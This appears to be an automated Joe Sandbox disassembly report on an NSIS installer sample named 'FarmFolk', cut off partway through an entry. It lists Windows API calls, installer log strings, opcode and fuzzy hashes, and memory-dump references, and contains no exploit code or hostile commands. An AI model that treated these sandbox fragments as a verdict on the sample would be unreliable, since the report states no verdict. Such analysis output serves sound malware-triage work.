                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                          • String ID:
                                                                          • API String ID: 310444273-0
                                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                          Control-flow Graph [rendered graph image and node/edge dump not reproduced]
                                                                          APIs
                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                          • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                          Strings
                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                          • Sleep(%d), xrefs: 0040169D
                                                                          • Rename: %s, xrefs: 004018F8
                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                          • Jump: %d, xrefs: 00401602
                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                          • Call: %d, xrefs: 0040165A
                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                          • detailprint: %s, xrefs: 00401679
                                                                          • BringToFront, xrefs: 004016BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                          • API String ID: 2872004960-3619442763
                                                                          • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                          • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                          Control-flow Graph [rendered graph image and node/edge dump not reproduced]
                                                                          APIs
                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                          • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                          • API String ID: 608394941-1650083594
                                                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                          • CompareFileTime.KERNEL32(-00000014,?,FarmFolk,FarmFolk,00000000,00000000,FarmFolk,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                          • String ID: FarmFolk$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                          • API String ID: 4286501637-3866668
                                                                          • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                          • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                          Control-flow Graph (entry block 403587-4035d5; graph view not reproduced in this text export)
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00403598
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                          Strings
                                                                          • Inst, xrefs: 0040366C
                                                                          • Null, xrefs: 0040367E
                                                                          • Error launching installer, xrefs: 004035D7
                                                                          • soft, xrefs: 00403675
                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                          • API String ID: 4283519449-527102705
                                                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                          Control-flow Graph (entry block 40337f-403396; graph view not reproduced in this text export)
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 004033E7
                                                                          • GetTickCount.KERNEL32 ref: 00403464
                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                          • wsprintfW.USER32 ref: 004034A4
                                                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                          • String ID: ... %d%%$P1B$X1C$X1C
                                                                          • API String ID: 651206458-1535804072
                                                                          • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                          • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                          Control-flow Graph (entry block 401eb9-401ec4; graph view not reproduced in this text export)
                                                                          APIs
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • GlobalFree.KERNELBASE(007A1CE8), ref: 00402387
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FreeGloballstrcpyn
                                                                          • String ID: Exch: stack < %d elements$FarmFolk$Pop: stack empty
                                                                          • API String ID: 1459762280-262958340
                                                                          • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                          • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                          Control-flow Graph (entry block 4022fd-402325; graph view not reproduced in this text export)
                                                                          APIs
                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                          • GlobalFree.KERNELBASE(007A1CE8), ref: 00402387
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                          • String ID:
                                                                          • API String ID: 3376005127-0
                                                                          • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                          • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                          Control-flow Graph

                                                                          control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                          • String ID:
                                                                          • API String ID: 2568930968-0
                                                                          • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                          • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                          Control-flow Graph

                                                                          control_flow_graph 625 402713-40273b call 406009 * 2 630 402746-402749 625->630 631 40273d-402743 call 40145c 625->631 633 402755-402758 630->633 634 40274b-402752 call 40145c 630->634 631->630 635 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 633->635 636 40275a-402761 call 40145c 633->636 634->633 636->635
                                                                          APIs
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                          • String ID: <RM>$FarmFolk$WriteINIStr: wrote [%s] %s=%s in %s
                                                                          • API String ID: 247603264-3578718010
                                                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                          Control-flow Graph

                                                                          control_flow_graph 732 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 743 402223-4030f2 call 4062a3 732->743 744 40220d-40221b call 4062a3 732->744 744->743
                                                                          APIs
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
